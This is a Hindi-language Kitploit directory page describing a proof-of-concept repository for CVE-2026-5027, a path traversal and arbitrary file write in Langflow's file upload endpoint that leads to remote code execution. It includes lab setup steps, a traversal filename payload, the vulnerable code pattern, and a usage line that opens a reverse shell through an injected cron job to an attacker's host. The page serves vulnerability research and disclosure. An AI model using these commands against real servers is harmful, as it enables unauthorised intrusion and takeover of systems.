Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5027 — Langflow, Path Traversal के माध्यम से Cron Job Injection द्वारा Remote Code Execution (RCE) | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2026-5027
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubeqstlab/cve-2026-5027

CVE-2026-5027

Langflow, Path Traversal के माध्यम से Cron Job Injection द्वारा Remote Code Execution (RCE)

रिपॉजिटरी देखें
33 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यह पोस्ट EQSTLab द्वारा प्रकाशित एक शोध लेख है।

Yahia Hamza को धन्यवाद, जिन्होंने इस भेद्यता की रिपोर्ट और विश्लेषण किया।

CVE-2026-5027

★ CVE-2026-5027 Langflow पाथ ट्रैवर्सल / आर्बिट्रेरी फ़ाइल राइट PoC ★ CVE-2026-5027 PoC परीक्षण


विवरण

CVE-2026-5027 : Langflow आर्बिट्रेरी फ़ाइल राइट भेद्यता

विवरण: Langflow <= 1.8.4 में एक पाथ ट्रैवर्सल भेद्यता हमलावरों को /api/v2/files एंडपॉइंट पर भेजे गए क्राफ्टेड मल्टीपार्ट filename के माध्यम से इच्छित अपलोड निर्देशिका के बाहर मनमानी फ़ाइलें लिखने की अनुमति देती है। ऐसे डिप्लॉयमेंट्स में जहाँ ऑटो-लॉगिन सक्षम है या प्रमाणीकरण अन्यथा कमज़ोर रूप से लागू किया गया है, इस समस्या का उपयोग संवेदनशील फ़ाइलसिस्टम स्थानों पर हमलावर-नियंत्रित सामग्री लिखकर रिमोट कोड एक्ज़ीक्यूशन प्राप्त करने के लिए किया जा सकता है।


लैब सेटअप

Docker का उपयोग करके कमज़ोर वातावरण बनाएँ और चलाएँ:

इमेज बनाएँ

root@kitploit:~
docker build -t cve-2026-5027 .

कंटेनर चलाएँ

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

उपयोग कैसे करें

निष्पादन

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

विश्लेषण

कमज़ोर एंडपॉइंट

root@kitploit:~
POST /api/v2/files

समस्या इसलिए मौजूद है क्योंकि अपलोड कार्यक्षमता क्लाइंट द्वारा प्रदान किए गए मल्टीपार्ट filename मान पर भरोसा करती है। सुरक्षित सर्वर-साइड स्टोरेज नाम उत्पन्न करने या हल किए गए पथ को समर्पित अपलोड निर्देशिका तक सीमित रखने के बजाय, कमज़ोर कोड पथ ../ जैसे ट्रैवर्सल अनुक्रमों को अंतिम गंतव्य पथ को प्रभावित करने की अनुमति देता है।

परिणामस्वरूप, एक हमलावर इच्छित स्टोरेज रूट से बाहर निकल सकता है और एप्लिकेशन को सर्वर फ़ाइलसिस्टम पर मनमाने स्थानों पर फ़ाइलें लिखने के लिए मजबूर कर सकता है।

एक प्रतिनिधि शोषण प्रवाह इस प्रकार है:

  1. सामान्य लॉगिन या ऑटो-लॉगिन-सक्षम डिप्लॉयमेंट के माध्यम से एक एक्सेस टोकन प्राप्त करें।
  2. /api/v2/files पर एक मल्टीपार्ट अपलोड अनुरोध सबमिट करें।
  3. पाथ ट्रैवर्सल अनुक्रमों वाला एक क्राफ्टेड filename प्रदान करें।
  4. Langflow को अपेक्षित स्टोरेज निर्देशिका के बाहर हमलावर-नियंत्रित सामग्री लिखने के लिए प्रेरित करें।

यह मूल रूप से एक CWE-22: Improper Limitation of a Pathname to a Restricted Directory समस्या है।

तकनीकी मूल कारण

यह सुरक्षा दोष अपलोड हैंडलिंग के दौरान उपयोगकर्ता-नियंत्रित फ़ाइल पथों के अपर्याप्त सैनिटाइज़ेशन और सत्यापन के कारण होता है। एप्लिकेशन क्लाइंट के मूल फ़ाइलनाम को स्वीकार करता है और उसे पर्याप्त रूप से पथ सामान्यीकरण और कंटेनमेंट लागू किए बिना स्टोरेज वर्कफ़्लो में पास करता है।

रक्षात्मक दृष्टिकोण से, खतरनाक पैटर्न अवधारणात्मक रूप से निम्नलिखित के समान है:

root@kitploit:~
save_path = base_dir / file.filename

यदि file.filename में पाथ ट्रैवर्सल घटक शामिल हैं जैसे:

root@kitploit:~
../../../../tmp/poc.txt

तो अंतिम हल किया गया पथ base_dir के बाहर इंगित कर सकता है, जिससे मनमानी फ़ाइल लेखन संभव हो जाता है।

यह क्यों महत्वपूर्ण है

मनमानी फ़ाइल लेखन भेद्यताएँ अक्सर मानक असीमित अपलोड समस्याओं से अधिक गंभीर होती हैं क्योंकि हमलावर न केवल फ़ाइल सामग्री को नियंत्रित करता है, बल्कि गंतव्य पथ को भी नियंत्रित करता है। Langflow प्रक्रिया के रनटाइम विशेषाधिकारों के आधार पर, यह सक्षम कर सकता है:

  • एप्लिकेशन फ़ाइलों को अधिलेखित करना
  • स्टार्टअप या शेड्यूल्ड टास्क फ़ाइलों का संशोधन
  • शेल इनिशियलाइज़ेशन या प्रमुख फ़ाइलों के माध्यम से पर्सिस्टेंस
  • मनमानी फ़ाइल लेखन से रिमोट कोड एक्ज़ीक्यूशन तक वृद्धि

परिदृश्य

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

अस्वीकरण

यह रिपॉजिटरी Langflow इंस्टेंसों के अनधिकृत शोषण को सुविधाजनक बनाने के लिए नहीं है। इस परियोजना का उद्देश्य सुरक्षा शोधकर्ताओं, रक्षकों और डेवलपर्स को भेद्यता को समझने, नियंत्रित वातावरण में जोखिम को मान्य करने और प्रभावी शमन उपायों को लागू करने में मदद करना है।


संदर्भ

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

टूल डाउनलोड करें